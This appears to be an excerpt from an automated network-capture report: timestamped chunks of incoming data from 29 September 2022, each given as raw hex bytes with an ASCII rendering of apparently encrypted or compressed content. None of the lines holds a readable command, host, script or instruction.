                                                                                                                                                            2022-09-29 12:44:57 UTC2970INData Raw: 5f 03 7d c1 a7 4e 54 48 25 47 9c 33 be 7c 8c 29 ef 4d b4 97 e5 a3 88 43 c2 94 ac cb 01 15 b3 ca 7a f2 2f e9 c8 7f 44 47 c8 02 07 d2 df d9 8d 89 dd d4 37 3b be 66 cb 6f fa bb b2 e3 e0 ec 26 9b d1 3e 2f 83 91 03 ed ba 62 9f 97 b1 68 44 5a 73 1d 0c f7 31 34 17 ec ad be 85 1d c2 c7 2a 04 54 c1 12 21 f4 f1 f9 11 14 af 34 f2 35 b1 18 72 0c d4 8f 60 34 5d 5c d7 6b 69 94 e4 a4 a1 db 73 b8 b1 c3 64 c3 40 87 d0 66 fa 33 ae f5 7e 5f 70 28 e8 4a 28 ac c8 00 57 cc bf d4 db cb 5f f7 45 46 a2 6b c6 f0 b8 c9 3f 5c 31 9d 81 39 a2 39 b9 d0 af 7e f9 17 b2 94 1d 47 84 5a 27 f6 d9 e1 aa 09 97 9f f0 62 de 73 fc 82 b9 2d de 8e 66 4c 6f 46 58 d9 78 5f a2 01 a0 ed 21 e5 a4 00 e0 3a a5 b0 ac 16 45 df fb 88 d3 0b 2e d5 ed 0b ea c2 a9 3d fa 0d 29 ef f2 0e 88 b3 01 1c eb 61 9b 2f b5
                                                                                                                                                            Data Ascii: _}NTH%G3|)MCz/DG7;fo&>/bhDZs14*T!45r`4]\kisd@f3~_p(J(W_EFk?\199~GZ'bs-fLoFXx_!:E.=)a/
                                                                                                                                                            2022-09-29 12:44:57 UTC2986INData Raw: d4 bb 1e 6a a6 69 c6 10 14 f0 ca f2 37 4e 36 30 5c b8 98 53 08 a8 77 ac 07 f2 14 da 33 47 a7 45 17 11 63 f9 db bf 1e a4 81 1d dc 9b 8b db 22 7f d5 99 a4 04 98 f5 ad 3e 9d f0 8b 72 f6 ed 23 85 9e 84 c7 22 25 b3 d2 48 bc 05 3c b5 4b b1 2a a1 5c 26 e1 e8 68 89 5c 37 53 0f 3b 07 c7 38 2e bc bd 14 df 7d f2 c6 f5 ea 4e 82 f7 af f4 c4 f9 45 0b c3 70 38 d5 5d c2 10 55 50 cc 42 f6 5f ad 79 14 04 ef df 83 1e bf 3b 04 d7 43 b5 71 33 1e 4a 96 37 52 e1 37 44 3f f5 87 21 c0 b9 35 01 40 99 4e ec 59 ca 57 c2 91 f6 3b 08 9f 7a 36 17 af a9 ed b9 f1 a4 03 57 c4 b0 40 14 12 0c 03 1a 5e 2e a0 01 86 ad 45 27 05 6d 90 04 51 49 ae e1 64 4a c0 36 68 79 f2 8f a5 25 eb ed bd 21 e2 c6 4e 3a 93 0e 78 0d 1b 1a a6 6e e3 66 81 80 79 a3 61 9f d8 1f 3f fe 35 48 6e 7f 43 79 c5 c7 8a 0b 3c
                                                                                                                                                            Data Ascii: ji7N60\Sw3GEc">r#"%H<K*\&h\7S;8.}NEp8]UPB_y;Cq3J7R7D?!5@NYW;z6W@^.E'mQIdJ6hy%!N:xnfya?5HnCy<
                                                                                                                                                            2022-09-29 12:44:57 UTC3002INData Raw: ba 6a 8f 76 2a 81 d3 4a 23 f1 0b 4d ac 62 e4 07 3f 48 b7 ef 17 6f dd 7c 4f 80 22 29 ef e4 be b2 a8 31 11 af 3a 67 62 2a a7 b8 77 07 54 6d 56 3f 4d 47 03 5b 0b 98 ae c0 15 7f 9b 84 8d 43 41 80 17 35 fd 88 2f c9 3a 48 43 de 26 06 46 26 9a 90 3e 3f 4f 5e 06 8b 09 eb ef b4 c2 01 f4 6a 38 2e 8e 19 ea 91 b7 f7 b2 6a 34 36 f0 2a 62 12 83 64 4e f2 c1 3f 25 f6 c7 ea 7f f6 46 53 7d 94 75 d0 f6 2e 85 ff 61 14 92 b3 e0 57 38 e5 0c 6e 5f 14 a2 ac ef 06 9e ef 3d d1 7f 83 54 2a e7 7c dc 56 1c a7 4f bf 6e dd c7 bd 08 e3 ab af 6f 0e 0e 7e 8b d3 ca 13 98 cd 18 76 a8 f6 b8 bc 66 93 5e a9 1c e2 f6 7d 20 22 3c 87 3c 54 51 0d 0b 6a 0a e3 55 ee 61 e9 fe c5 42 2e c9 72 2f 9c b3 9b 5b 32 c0 10 44 2d 9e 21 80 af cf 08 13 a4 8d 74 bc ce 18 88 77 51 bf 73 0c 72 81 38 e5 b5 7e 9f ce
                                                                                                                                                            Data Ascii: jv*J#Mb?Ho|O")1:gb*wTmV?MG[CA5/:HC&F&>?O^j8.j46*bdN?%FS}u.aW8n_=T*|VOno~vf^} "<<TQjUaB.r/[2D-!twQsr8~
                                                                                                                                                            2022-09-29 12:44:57 UTC3018INData Raw: de 47 dd dc da 75 02 4d b7 f9 17 e8 7c b3 6e bd f4 30 9d 8f e4 99 e4 88 21 58 7f 87 52 44 6d 90 43 bc 91 80 4f 73 6c a2 4b 8f e7 40 99 f9 92 1c 5d 7c a5 1e 96 e6 88 6a 9f 9f 3a 5f 70 22 5a 00 9e 81 70 95 15 81 0d d3 43 74 e5 69 bf 7f 9d 16 c3 b0 08 7f b0 be c9 9e ba cd b2 80 c9 57 f1 93 b0 4e 0f 80 70 18 42 84 ad 09 c5 ae 2e c9 17 cf d1 ea bb c5 c1 77 b2 07 84 f0 0a ae 67 bb 6b 92 3c f6 95 fb 08 14 3e 73 89 5c 9a ce 66 05 96 cc 94 cf f4 7e c0 e4 85 10 16 5e da 33 19 2e 73 1b 26 d6 9f 22 52 72 28 c3 1f 56 34 6c 3f 22 85 dc 8c 2d a8 d6 56 b9 bd 6f a3 58 95 fd bc 39 90 2c 78 83 80 de 28 fb 9a 22 b2 a4 63 45 e0 31 d4 41 29 28 0d 13 0f 7d ef fe fd d6 d3 66 7a 5a 90 07 7a 77 ba bb e6 9b f2 c7 c4 8a 13 cd c8 67 9c 0d d8 5e 70 50 22 0b 0e fd b5 77 b6 77 a3 20 e3
                                                                                                                                                            Data Ascii: GuM|n0!XRDmCOslK@]|j:_p"ZpCtiWNpB.wgk<>s\f~^3.s&"Rr(V4l?"-VoX9,x("cE1A)(}fzZzwg^pP"ww
                                                                                                                                                            2022-09-29 12:44:57 UTC3034INData Raw: db 73 55 98 ca 6d 3f 72 93 b2 fe d9 28 ef 2c 6a 64 4f a9 4d 66 1d 94 c5 57 cb c0 30 7c b2 f5 66 06 ce 7a 54 50 26 b1 f1 11 e4 31 41 3e f1 3c 83 40 64 22 c1 97 12 73 ce 93 1a c6 e6 18 a6 ca 37 df db 03 b3 ea 71 7d 71 c4 b1 d6 f8 aa ea e7 01 d0 5e bf bc 44 ba 51 f6 bf c4 bf 02 f3 dc fd 61 63 fc 0a a9 c9 fc ed 53 27 ae da b8 26 8c 43 06 50 8f c1 51 33 61 8e 0d db 6f 8c e0 67 23 ea 15 47 98 72 cc c5 9f 44 43 6d dc 56 a3 80 fd 5d 5a 69 a2 10 1a 6d d6 65 d6 63 c6 5b d9 ef 34 1c d3 84 1c 71 01 c4 ac 37 17 b0 e0 e0 d0 1e a1 2c bc ff 55 cb 74 48 c6 65 72 7b e7 90 b3 71 4b 59 80 f6 5b 00 53 ed 50 a7 5d f8 fe e4 df d6 60 0a 2b f3 92 64 ee c7 36 68 c7 4a 33 31 09 fa 6e 49 48 4f 01 47 c6 77 49 ae ab d0 a6 47 c4 3b 0c 62 ec 78 3e aa a6 56 2e a3 2b 1e 48 54 44 5b dc 78
                                                                                                                                                            Data Ascii: sUm?r(,jdOMfW0|fzTP&1A><@d"s7q}q^DQacS'&CPQ3aog#GrDCmV]Zimec[4q7,UtHer{qKY[SP]`+d6hJ31nIHOGwIG;bx>V.+HTD[x
                                                                                                                                                            2022-09-29 12:44:57 UTC3050INData Raw: 07 69 51 5f 69 19 ca ec 3f 4d a4 65 f9 6c 12 90 e3 95 72 d1 76 a6 2e 85 31 45 59 30 ed d3 cf 9a 6b 0a 7c 73 6a c9 d5 8c 73 38 67 a4 b9 29 2c c4 71 0e 3c c6 ed b4 c4 b9 eb f6 37 f7 71 73 eb 07 61 49 2d 4b 24 fa 90 5c 73 f5 c2 3c 58 f4 24 be 31 7c cf a2 2b 9a 0d 38 05 d2 d4 0b b3 56 cc 0f 9f 99 ac 2f df 2b 7c 3a 52 88 68 0a 42 9d f1 69 d5 01 36 b8 74 03 0e a0 a0 86 e5 bc af 57 47 88 0e 05 83 5b 29 c2 fa 64 79 b0 33 be 32 5c 2a 21 7c d5 89 bd 6f e4 ae bc fe 3b bc b0 9a 4c 60 ca 22 ef c1 c3 55 3f 2f c4 fc e6 28 75 74 ea 11 14 1f df e4 9e 8c 63 dc ea bd ce 28 df b4 7a 4e 9a 03 a4 a8 42 47 46 ea 87 06 2e 19 76 dd 29 04 94 d8 ac bf d1 28 4b 2a d9 a3 39 05 ef 97 da 69 00 7b 0e 65 be 7e 9e 90 41 b6 46 7e e8 90 ca 13 ce f3 d2 19 ed 24 ac 61 c7 64 25 b8 a2 51 26 99
                                                                                                                                                            Data Ascii: iQ_i?Melrv.1EY0k|sjs8g),q<7qsaI-K$\s<X$1|+8V/+|:RhBi6tWG[)dy32\*!|o;L`"U?/(utc(zNBGF.v)(K*9i{e~AF~$ad%Q&
                                                                                                                                                            2022-09-29 12:44:57 UTC3066INData Raw: e8 af 27 10 1c 4e 5b 22 3d a6 45 f4 38 03 76 03 0f 41 c2 fe e6 a9 cd 00 68 5b b6 91 e6 79 d1 ca 5f c1 17 01 2c 75 e5 58 57 78 8b 8b b0 e3 e9 40 48 6d b1 a3 da 81 45 e9 cb c7 28 a5 3e 09 3e dd cf 9c f0 d7 5e bd b9 2e ac 47 25 87 eb 04 55 61 2a c1 44 41 33 58 d1 85 74 ef 3c 5d 61 90 3d 7f 7b a5 4a de e6 12 5b a1 65 04 83 7d 3c 2f bb 33 a1 26 01 86 97 9c d0 a2 50 e9 a3 8e 70 6b d8 e5 3e f3 a2 00 f4 da 00 33 e4 d7 ec dd b7 85 7e 58 b3 42 0a 4f 52 1e c1 58 fd 8b 45 8a 3c 61 86 f0 32 f1 cd 85 6c ff 14 32 7f f8 e0 69 e3 ed d0 a1 e3 4b ea ec dd bc 69 2e 96 e1 4b 5c 04 97 69 d7 df 75 55 f2 7c 6c 9f ca dc f5 10 fe 7c 38 53 04 51 0e 37 30 73 f7 f9 7d 50 f7 b1 e9 a7 16 a5 59 b3 ea a5 ff 44 4a a4 16 c5 da 6e 39 b0 bc 2f ee 32 76 98 4a 55 31 47 97 8b ec 28 a2 50 c1 df
                                                                                                                                                            Data Ascii: 'N["=E8vAh[y_,uXWx@HmE(>>^.G%Ua*DA3Xt<]a={J[e}</3&Ppk>3~XBORXE<a2l2iKi.K\iuU|l|8SQ70s}PYDJn9/2vJU1G(P
                                                                                                                                                            2022-09-29 12:44:57 UTC3082INData Raw: 0f 0e c8 7a a5 58 46 e9 b0 b3 06 50 19 c5 a7 f3 5c a9 fa 70 c6 cd 11 7d e8 ad 9c da 23 ae 64 79 de 9e 3d 3f 96 27 28 53 b1 36 43 7b 05 dc 77 a9 4c 22 47 2e dc 2a 28 f7 01 7b 1f 4a 2b 1e 99 50 89 03 2d 85 e2 b7 7c dd f8 dd 70 17 eb af 7e f5 89 8a ff a0 9e 7d 4f e5 79 9e 65 9b f7 be 43 35 97 1e 4a 66 6a 1a 86 aa 13 f3 19 92 11 9c 8a 8a 35 9d b1 a9 6f 70 3d 98 0d df c7 51 c6 5f ba b3 49 c5 96 c0 94 27 23 9c 7e 42 04 00 b9 3d 1d d7 3e ff 78 6a 29 52 a2 ba a2 eb 8a 76 97 43 5a 83 d0 fe e4 a5 ae 35 3f f9 cd 25 0e 6f 2c 63 cd ca 1f e0 8d aa aa a3 0b 3b 3d 2a 5f 53 41 e8 2c 95 a9 54 53 16 f3 94 fe a8 83 41 fb a7 e2 e5 42 ca 98 0c ca 39 b7 09 b8 ee c8 c1 98 83 69 bd 6e 35 33 09 66 3c fa b1 06 0e c0 06 42 43 3e fc 51 48 45 d1 23 bc b3 97 34 57 2f 90 67 65 bd 28 18
                                                                                                                                                            Data Ascii: zXFP\p}#dy=?'(S6C{wL"G.*({J+P-|p~}OyeC5Jfj5op=Q_I'#~B=>xj)RvCZ5?%o,c;=*_SA,TSAB9in53f<BC>QHE#4W/ge(
                                                                                                                                                            2022-09-29 12:44:57 UTC3098INData Raw: f4 4a 5e 72 a5 a8 9b b0 ee 64 ee a8 fa 82 0a 3b 3e 52 83 0e 69 fe 1e ea 94 59 af b6 5a 46 95 6b 93 71 9d e9 2e 07 5d ee a3 02 be 79 98 bd 8f 72 da 51 b7 03 ce 32 fd bf 12 f8 be a5 fd 0d 19 ab 34 8f 9b e8 16 92 d9 34 70 f0 d1 c0 dc 7c 1d 9a 5d 22 72 e9 2e dc d2 11 af d1 df 2f dd 78 3a 05 49 2f a8 7d 6a ce 76 b1 61 db a9 4c da 0e 1d 61 67 48 c2 1f 54 68 3b fb f8 1a a9 f9 d8 0c 0e 85 60 0f bf b9 bb d8 3d dc 73 f2 be 4f 8c 0f 29 aa 60 d6 92 85 b5 96 08 99 b1 94 16 6a 02 ec ac e7 4c cd f7 86 c2 6f a2 aa ac 70 e7 18 93 b6 c1 d5 a2 e3 e9 27 a4 7f e8 f6 e9 20 ec d5 7a 1e 51 2b 8d 41 14 c6 9a 6e e9 2d 9f 5b bf 72 fd 34 51 c2 df 8b 6b 1a 34 e3 fb 44 6a a6 87 0d 03 1a 7c 1b 4d 47 03 3a 83 33 68 42 12 fd 69 26 2f 46 a1 89 51 fc 95 90 25 45 76 55 00 84 be a8 37 c6 5c
                                                                                                                                                            Data Ascii: J^rd;>RiYZFkq.]yrQ244p|]"r./x:I/}jvaLagHTh;`=sO)`jLop' zQ+An-[r4Qk4Dj|MG:3hBi&/FQ%EvU7\
                                                                                                                                                            2022-09-29 12:44:57 UTC3114INData Raw: 8e ce 56 57 3e 0e db 89 c0 6e 9a 55 69 04 50 7a 23 5b 18 66 c3 ec e3 2e 23 56 aa 68 ec 25 bc e4 c9 cc e6 86 dd 1d 00 c0 74 97 e1 a9 bf 97 c1 cd 17 73 66 fd 22 b1 1f 0d a2 14 8b de 50 d2 1c ed b8 b8 07 cb b1 38 33 ed 1e f7 0c db 6d 3e 84 2f 3e 1e ec aa 38 55 4b 99 92 fc 31 72 bc 1d 50 ad 99 79 ca a9 93 e0 aa 9b 89 90 67 3f 47 40 1a 8f 9f 13 d2 19 0a aa 24 89 5a af e9 2f 42 82 dd e9 ae c1 4a 0b c6 d8 3c 55 f3 21 24 05 08 5c 44 ae 50 fe df b2 fc 35 28 08 2f 7e 9a 87 b9 4c 82 6b 5c 4c 46 68 a4 6e 72 c3 41 10 d6 90 ca 83 bc 0d 7d 40 a3 fa 81 37 08 ed 3c 0f 0c 0f 19 55 d3 6f 60 23 d9 4b 6b 01 90 57 4d aa 98 e8 b3 76 5d 26 bc fe 0e ed 97 62 fb 4f c9 c7 2d c3 43 ad e8 1c f9 a0 cb 7c 9b 56 f2 ac d0 b6 94 84 66 28 4b 54 a4 7a f3 ff 8b 14 66 74 15 ba d9 00 14 05 3e
                                                                                                                                                            Data Ascii: VW>nUiPz#[f.#Vh%tsf"P83m>/>8UK1rPyg?G@$Z/BJ<U!$\DP5(/~Lk\LFhnrA}@7<Uo`#KkWMv]&bO-C|Vf(KTzft>
                                                                                                                                                            2022-09-29 12:44:57 UTC3130INData Raw: 2c 11 5a ee b2 eb c7 d7 ca c4 7b 18 7d a0 00 1c e3 71 1e 81 6a 66 15 c9 d2 c0 7d bb eb 29 8f 91 2b 19 60 5b d5 f6 fb f4 c5 ac 11 20 e8 ac 13 28 cc ac 44 69 69 91 3c a9 cc 47 84 9b f2 69 4a 03 23 f9 ff 08 3e fe 40 c2 b8 34 53 8d 8c 15 f8 a3 84 8e 77 3b 61 00 c1 90 78 3e 71 4a 7f 5b 58 54 d4 32 06 02 f5 6b a8 50 88 6e 87 32 22 81 39 dd 8f dd b7 8f 45 29 52 85 5d 3b 91 ff ef 1d 26 ac 91 96 e8 82 88 cf d9 30 f6 6c ce 6b 07 0a 02 9d a9 bf 77 a4 fa b5 9a 62 c9 66 5c ee df ab 57 d2 76 d3 68 df 94 e8 60 d0 a4 70 a1 76 02 17 a7 29 77 21 07 db f8 50 49 12 94 91 6a f4 a5 85 44 04 d9 a6 a9 ca cf d3 9d 3f 02 a6 60 8d 86 47 71 c5 91 33 86 4e 9c a3 c4 1d a5 93 64 06 a9 1c bd d9 6d 45 ce 96 f4 06 df fe 33 42 5d de bf 58 da 81 7b 3e c3 b3 93 f8 16 5b a4 8d 4b aa 54 61 e2
                                                                                                                                                            Data Ascii: ,Z{}qjf})+`[ (Dii<GiJ#>@4Sw;ax>qJ[XT2kPn2"9E)R];&0lkwbf\Wvh`pv)w!PIjD?`Gq3NdmE3B]X{>[KTa
                                                                                                                                                            2022-09-29 12:44:57 UTC3146INData Raw: 5f 32 05 77 ee a5 25 12 8c 6d e6 f1 6c d6 47 b7 6c 29 1a f5 6b 7b ad ea 7b bf c0 30 a1 8c ec 26 05 d2 db 84 e7 57 f7 10 9e b2 a5 92 35 16 ac bd 90 49 79 8b 88 e5 60 dd f3 83 77 2c 6b 96 c0 df 9c 34 ee aa ce dd aa c0 76 77 fb d8 ea 20 ab 58 05 e6 f5 3b 0f af 33 bf 7d 28 88 c4 5e 89 fd 33 fb 05 ca 4d 8d e8 90 c3 69 dd e6 47 d7 b3 5d 1d c0 1e 3d 51 5e f8 a3 00 f1 8a ec b6 1f 64 59 bd 1c 80 fa 41 4c bd be 24 a7 cb 6f 0b 7f ff 0b fb 48 84 81 f3 a1 0f 36 40 5e 76 46 94 4a db 36 90 6c d0 b8 42 65 35 5b a1 5d 56 58 bf 0a 01 a9 ac 9a 52 46 a5 f8 d1 50 fa 50 a6 ba e9 db fa 04 8f f9 5c 10 cc 3f c7 b1 3e 87 d2 d9 e9 a6 db c0 ad 44 8b 7b 1d 4c 98 68 5f ba 76 e5 98 53 f1 55 6d 35 4e b8 00 4e 4c f1 4d c6 2c 99 08 eb 8c d9 d3 ee ce e1 25 c4 59 50 e8 7a 39 dc 43 b7 39 08
                                                                                                                                                            Data Ascii: _2w%mlGl)k{{0&W5Iy`w,k4vw X;3}(^3MiG]=Q^dYAL$oH6@^vFJ6lBe5[]VXRFPP\?>D{Lh_vSUm5NNLM,%YPz9C9
                                                                                                                                                            2022-09-29 12:44:57 UTC3162INData Raw: 9c aa a4 2b 5a 31 6f 51 0f 7d 81 a3 26 bd 1c 7d 6e dc a4 23 d5 d4 16 10 22 9a 0a 69 26 9c ea 20 4a ee 8c 87 6c 23 64 fb 76 ee dc 5d 77 6e 54 8d 98 a6 7b 5c 86 3a a9 3d f5 5b 88 77 b9 be 10 f7 c0 99 bd f3 e3 8a 7f 41 a9 2c 30 f6 74 26 43 92 63 84 86 18 43 43 e5 ef 32 b9 a9 b8 1a cc b0 81 ed 84 0f dc 0d a6 53 b5 56 23 ab 45 16 bf 26 41 2a 17 9a e3 68 f6 70 89 14 4a ff c7 9e 42 33 89 57 bf b0 95 95 55 c0 93 aa 4a f1 95 16 b8 14 0a c8 0f 20 a3 97 91 06 4b ed 2d 8c 59 08 3d 9e cc 4b 97 ab 98 78 67 cd a5 06 e7 f2 c2 4e 48 e1 e2 d4 5c bc ea 03 3a f0 57 74 19 5d 64 5f 6e 71 8d 6c 5a c0 54 7b 70 d5 e0 15 86 3e c0 d3 36 bb 8d 7c f2 0f 70 00 1d 8a 27 0f 4f 0c d2 cd 41 04 dc 5f 70 56 50 e7 fa bb 8b cd 42 1d 6b d6 e0 48 00 da a4 9f 2c 07 ab 15 ed ed 31 84 ff 3a 5f af
                                                                                                                                                            Data Ascii: +Z1oQ}&}n#"i& Jl#dv]wnT{\:=[wA,0t&CcCC2SV#E&A*hpJB3WUJ K-Y=KxgNH\:Wt]d_nqlZT{p>6|p'OA_pVPBkH,1:_
                                                                                                                                                            2022-09-29 12:44:57 UTC3178INData Raw: dd bd ec af 38 1e 81 1a 3c 78 14 ca de 0c 55 3f f9 0f f2 e5 06 08 3f bc 99 7c 71 31 d4 9c c6 67 78 62 9f b0 be 73 bc 11 1c b4 0b df cd 7a 77 a8 95 bd 8b c1 40 c0 a4 74 ec 7d e4 29 0e e7 5c 41 35 87 29 fd 29 4d 1d 62 f2 0a 80 6a f3 8e db e1 94 99 fd 1a 5b c0 97 c1 8e ab 8c 9f 83 42 c8 4e 94 96 be dc a5 fa 3e 90 83 32 3f 08 90 8a 88 9a d3 38 0f e8 1d d6 40 ba 8a 3d 00 e9 4f 07 7e 20 46 e3 18 f8 e1 ae b0 44 5c e7 07 bd 18 fa 8c 82 42 d3 e1 a3 06 7a 1e b1 df b1 e8 3a 5c 99 14 f1 66 79 63 e1 1e 26 2d 87 2e d1 6c 8b cc 7f e0 47 de 30 61 97 52 1b 40 32 97 28 b4 b0 3c 57 ff 96 06 26 b1 cb 12 f6 f7 d2 02 6e 64 7f 18 26 fd e6 af e1 87 d6 7d 2c 73 d1 f0 dc 27 08 30 9d 81 56 76 f7 bf ae a9 4c 01 d1 2a da 7e cb 81 f5 45 96 1a 0b cb 13 85 e3 a8 2e 57 2c 5c 22 f4 ef 64
                                                                                                                                                            Data Ascii: 8<xU??|q1gxbszw@t})\A5))Mbj[BN>2?8@=O~ FD\Bz:\fyc&-.lG0aR@2(<W&nd&},s'0VvL*~E.W,\"d
                                                                                                                                                            2022-09-29 12:44:57 UTC3194INData Raw: 8e be 6f 1b 8f c4 08 9f 5f c1 d6 53 49 ac b4 bf 9a c7 3c e5 3d 63 86 60 08 4a a6 09 20 7f e3 23 fe 89 cd e6 72 1a 0a af 3d 0c 6b d2 96 bc 62 18 a3 fc 74 c9 f6 32 67 bb 60 59 dd 8d 7a b1 3e a0 8f 21 a8 e8 4f e7 2d 57 33 d3 21 a1 7e 8a 75 5f 03 ed 2b d9 b9 22 7c 36 65 0c 97 fd b3 8c 15 8f e6 24 32 f0 ba 4f 63 42 4a a4 4f 2c 78 eb 0a 98 73 8e 8c 48 93 7d 9d 10 1b 03 9d 05 11 5d a4 fa 1b a0 07 1e 85 c4 69 c9 44 24 02 27 ee 98 13 33 87 76 80 a2 e4 4b fb 63 ca 78 ee c0 05 95 ee 15 da d8 38 f2 7a 01 37 c4 66 fe e8 38 ba 9e cd 8c b4 f7 d6 83 ef 88 e8 e0 78 f4 30 9e 2b 15 06 f3 88 7a 22 3e 26 6e 42 7f 50 b0 06 d3 d7 c2 3b dd ef 1d 32 e0 fe 24 27 bb 4d 2f 65 cf de ab f4 7e 36 2e bd 23 38 82 a1 ba 98 b4 d8 d5 27 77 b3 c9 34 ac 46 9d 1d 77 26 9e 16 cf c8 ef ac c9 87
                                                                                                                                                            Data Ascii: o_SI<=c`J #r=kbt2g`Yz>!O-W3!~u_+"|6e$2OcBJO,xsH}]iD$'3vKcx8z7f8x0+z">&nBP;2$'M/e~6.#8'w4Fw&
                                                                                                                                                            2022-09-29 12:44:57 UTC3210INData Raw: 1e 76 0e 0b db 9c 1d 8c ba 6f 68 5a 33 94 ef 30 c7 58 e3 2b 2a 65 26 2b 97 60 21 ce 17 bc f0 e5 98 25 a9 a7 19 fe db 4c 59 0a 7a 69 ac b6 8d 09 06 47 bf 6c d6 e2 ae d3 b1 6e cc 4e 0c 67 fb 0b fc cc 9f 67 08 d9 30 fe 0f 76 38 9e 53 01 66 01 b0 f6 0d 34 e1 af a3 95 41 a8 32 dd 1f 1d 57 57 cb 21 72 bd c3 9f 0b d8 9b 73 80 a0 77 10 05 d6 82 3c 0a 25 1d 60 17 d1 4b 9f 8c 89 10 fc 39 22 23 8a a0 52 eb db bc 04 07 ab 81 a5 0b 3a 26 16 dc 31 a4 35 76 ea 0f be 83 d0 d2 90 e3 86 97 7a ba 13 c1 e0 a6 35 58 a4 66 c8 ac 57 5b 1d ac a3 c4 d4 17 50 a6 d6 d1 2a 56 69 b7 04 f4 6f 0a 48 d0 59 38 2c 4e e0 30 49 a9 04 3b 49 f9 42 3a 98 d9 c9 6e fe 8d 4c 03 ac 69 90 17 f1 e1 25 f9 06 48 35 b1 73 3f 70 f5 db a5 3f 48 d4 3c 80 ba 95 a4 53 30 71 a4 44 c3 8c 79 a4 12 d5 64 b8 b0
                                                                                                                                                            Data Ascii: vohZ30X+*e&+`!%LYziGlnNgg0v8Sf4A2WW!rsw<%`K9"#R:&15vz5XfW[P*VioHY8,N0I;IB:nLi%H5s?p?H<S0qDyd
                                                                                                                                                            2022-09-29 12:44:57 UTC3226INData Raw: 2a 67 19 18 04 fa e6 eb 41 bd 2f 4e 3b ac de 90 26 54 a2 c1 35 df 09 af fd a7 1a 9e 4d 88 7e 12 31 fa 98 d8 50 85 08 33 c9 16 af c3 c0 44 95 cb 78 94 d0 43 bd e2 69 b8 44 f5 ed 81 2d 75 db 16 f7 23 61 24 32 aa 84 01 c9 07 b6 46 46 df 3b 95 5b 44 b3 12 a4 2d 11 84 cd 3f 61 a0 e8 a8 74 34 1d 43 6c b0 6e 53 e3 cf 49 3e 82 92 1e 30 22 65 4d d7 30 23 ac 47 59 c3 17 e8 64 c6 88 5c 7d 41 5e e6 fd a9 4c be ba 09 64 94 77 48 04 24 87 31 f2 5a 95 a2 07 3f 73 a2 b2 4d d9 67 84 75 e2 3c 3b 63 cd 21 30 eb 48 00 87 f9 59 5e bb d5 ea 40 be 68 a3 ec 7e bb bf d7 44 54 8a c5 c8 4a 35 53 46 97 d6 f3 f7 9f 52 cd a1 33 82 23 9f 6b ae da 39 71 8b fa bb fb 83 db aa c6 a2 60 3c e6 08 c2 bf f9 fd 4b a5 31 60 9f 76 22 96 cb b7 87 9a 9f b9 92 51 66 c3 35 b3 e3 4a 37 3b 6f 70 85 76
                                                                                                                                                            Data Ascii: *gA/N;&T5M~1P3DxCiD-u#a$2FF;[D-?at4ClnSI>0"eM0#GYd\}A^LdwH$1Z?sMgu<;c!0HY^@h~DTJ5SFR3#k9q`<K1`v"Qf5J7;opv
                                                                                                                                                            2022-09-29 12:44:57 UTC3242INData Raw: be f4 5a 26 59 21 e7 0b d1 2c 85 d7 82 a2 5f 62 4c 5d a1 7f be 9b 22 3f c0 6e 62 c7 c1 73 06 68 f0 0a 35 af 51 fc 8b 00 18 c0 3c e0 c6 a5 dd b8 12 28 7f 16 a5 41 d0 d4 a3 73 1d 0e 54 8e 98 c3 0b 32 e5 7f 26 ab b3 33 61 4b 6c 62 67 da dd 39 25 90 1c b7 70 5e 84 b1 db 86 9f 46 09 40 33 c2 62 46 b7 93 c0 06 88 4d 86 73 b8 26 56 6c 43 b8 d2 95 9e f1 0f 60 2d 96 5d c5 ea fe a2 c2 08 74 de 94 43 38 4a 92 db 60 d9 e9 7b 2e 03 b3 17 33 38 cd 9a d1 82 04 18 fa 77 67 8b 52 3a 48 46 92 96 0f 3f 06 64 01 59 da 56 82 b3 50 91 cb 05 9b 3d 31 21 95 84 a8 9b 72 1f ba 68 67 8c 5d 41 f0 a1 9f 86 df a9 f7 cd f2 8f 44 f9 27 dd 81 08 fc ca 18 63 91 10 bd f5 b1 e5 f8 5d a3 1b 27 75 37 6b 46 de 19 fc 78 3d 7b 55 60 b2 6c 2c 29 d6 b5 86 a6 2d 79 ea 05 50 d7 f9 01 05 d7 8c 6b 26
                                                                                                                                                            Data Ascii: Z&Y!,_bL]"?nbsh5Q<(AsT2&3aKlbg9%p^F@3bFMs&VlC`-]tC8J`{.38wgR:HF?dYVP=1!rhg]AD'c]'u7kFx={U`l,)-yPk&
                                                                                                                                                            2022-09-29 12:44:57 UTC3258INData Raw: 3a ba 4a 63 16 57 6e d7 87 30 bd 1a bf 7d 77 89 c3 36 53 41 fb 44 d7 70 2c 83 40 de ef d9 0f 84 ae d5 da 7c 68 83 04 1c 96 b5 4f d2 80 e1 9a 4c 88 91 28 49 5b 71 cd 93 84 de ec fa c2 29 49 33 49 4f 67 1e 9e 61 ca 49 a8 50 43 b9 7f 4e 1b fb 48 cc 34 3c ac 93 6c 41 a7 9c ad 93 a3 39 af b5 ec 97 2b f8 62 f8 f1 7e 10 91 7e 5b eb b0 37 fd 36 ee 84 34 00 87 fe 9b 5b 79 f5 4a 62 2a 86 67 55 99 19 0b 0a 91 99 70 98 9c b2 00 95 54 2a f3 40 dd f8 6f ab 29 5d ec 97 fc a5 b6 56 ee c9 36 b8 76 fc af 89 0f 84 c4 9e f7 8b 75 b5 59 f5 dd 6c e0 8a df d2 cc bf 1d 06 4d fa 28 81 14 fe d3 86 73 00 ac 94 54 0d 56 59 22 7b fb ed 47 c3 78 28 ec c5 2f f7 4f fb 09 c5 ee 01 6b 87 72 e8 66 fc ed 7d 56 e6 8d b8 fa a7 fb 53 29 b5 21 41 a7 47 eb 47 e3 7a 58 c7 0d 6b 77 1f 6d 8d d2 d8
                                                                                                                                                            Data Ascii: :JcWn0}w6SADp,@|hOL(I[q)I3IOgaIPCNH4<lA9+b~~[764[yJb*gUpT*@o)]V6vuYlM(sTVY"{Gx(/Okrf}VS)!AGGzXkwm
